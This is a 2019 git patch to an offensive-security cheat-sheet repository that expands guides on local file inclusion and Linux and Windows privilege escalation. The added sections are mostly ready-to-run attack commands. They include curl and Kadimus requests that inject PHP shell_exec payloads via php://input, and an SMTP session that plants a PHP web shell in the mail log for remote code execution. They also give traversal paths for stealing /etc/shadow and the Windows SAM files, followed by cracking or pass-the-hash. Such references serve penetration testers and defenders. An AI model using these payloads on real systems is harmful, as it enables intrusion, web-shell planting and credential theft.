From a85fa5af28c7ff47a5674d3fb4315c04d7d9a45a Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Mon, 10 Jun 2019 00:05:47 +0200
Subject: [PATCH] Local File Include : rce via mail + kadimus

---
 File Inclusion/README.md                      | 73 ++++++++++++++++++-
 .../Linux - Privilege Escalation.md           |  9 ++-
 .../Windows - Privilege Escalation.md         | 12 ++-
 3 files changed, 85 insertions(+), 9 deletions(-)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index c6b17b1..25cd148 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -27,6 +27,7 @@
 * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
+* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files)
 
 ## Tools
 
@@ -119,7 +120,12 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
-NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+
+```powershell
+./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 
+curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
+```
 
 ### Wrapper zip://
 
@@ -150,11 +156,16 @@ http://example.com/index.php?page=expect://ls
 
 ### Wrapper input://
 
-Specify your payload in the POST parameters
+Specify your payload in the POST parameters, this can be done with a simple `curl` command.
 
 ```powershell
-http://example.com/index.php?page=php://input
-POST DATA: <?php system('id'); ?>
+curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v
+```
+
+Alternatively, Kadimus has a module to automate this attack.
+
+```powershell
+./kadimus -u "https://example.com/index.php?page=php://input%00"  -C '<?php echo shell_exec("id"); ?>' -T input
 ```
 
 ### Wrapper phar://
@@ -268,6 +279,35 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
 http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 
+### RCE via Mail
+
+First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
+
+```powershell
+root@kali:~# telnet 10.10.10.10. 25
+Trying 10.10.10.10....
+Connected to 10.10.10.10..
+Escape character is '^]'.
+220 straylight ESMTP Postfix (Debian/GNU)
+helo ok
+250 straylight
+mail from: mail@example.com
+250 2.1.0 Ok
+rcpt to: root
+250 2.1.5 Ok
+data
+354 End data with <CR><LF>.<CR><LF>
+subject: <?php echo system($_GET["cmd"]); ?>
+data2
+.
+```
+
+In some cases you can also send the email with the `mail` command line.
+
+```powershell
+mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
+```
+
 ## LFI to RCE via PHP sessions
 
 Check if the website use PHP Session (PHPSESSID)
@@ -296,6 +336,31 @@ Use the LFI to include the PHP session file
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
 ```
 
+## LFI to RCE via credentials files
+
+This method require high privileges inside the application in order to read the sensitive files.
+
+### Windows version
+
+First extract `sam` and `system` files.
+
+```powershell
+http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
+http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
+```
+
+Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
+
+### Linux version
+
+First extract `/etc/shadow` files.
+
+```powershell
+http://example.com/index.php?page=../../../../../../etc/shadow
+```
+
+Then crack the hashes inside in order to login via SSH on the machine.
+
 ## References
 
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index 09af954..681ef8a 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -43,7 +43,7 @@
 * [Groups](#groups)
     * [Docker](#docker)
     * [LXC/LXD](#lxclxd)
-* [Common Exploits](#common-exploits)
+* [Kernel Exploits](#kernel-exploits)
     * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
     * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
     * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
@@ -542,8 +542,13 @@ lxc exec mycontainer /bin/sh
 
 Alternatively https://github.com/initstring/lxd_root
 
+## Kernel Exploits
 
-## Common Exploits
+Precompiled exploits can be found inside these repositories, run them at your own risk !
+* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
+* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
+
+The following exploits are known to work well.
 
 ### CVE-2016-5195 (DirtyCow)
 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 87852a2..bb4b6da 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -94,7 +94,6 @@ List all users
 
 ```powershell
 net user
-net user Swissky
 whoami /all
 Get-LocalUser | ft Name,Enabled,LastLogon
 Get-ChildItem C:\Users -Force | select Name
@@ -250,7 +249,7 @@ REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 
 ### Passwords in unattend.xml
 
-Location of the unattend.xml files
+Location of the unattend.xml files.
 
 ```powershell
 C:\unattend.xml
@@ -265,7 +264,7 @@ Example content
 ```powershell
 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
     <AutoLogon>
-     <Password>*SENSITIVE*DATA*DELETED*</Password>
+     <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
      <Enabled>true</Enabled>
      <Username>Administrateur</Username>
     </AutoLogon>
@@ -281,6 +280,13 @@ Example content
     </UserAccounts>
 ```
 
+Unattend credentials are stored in base64 and can be decoded manually with base64.
+
+```powershell
+$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo="  | base64 -d 
+SecretSecurePassword1234*
+```
+
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 
 ### IIS Web config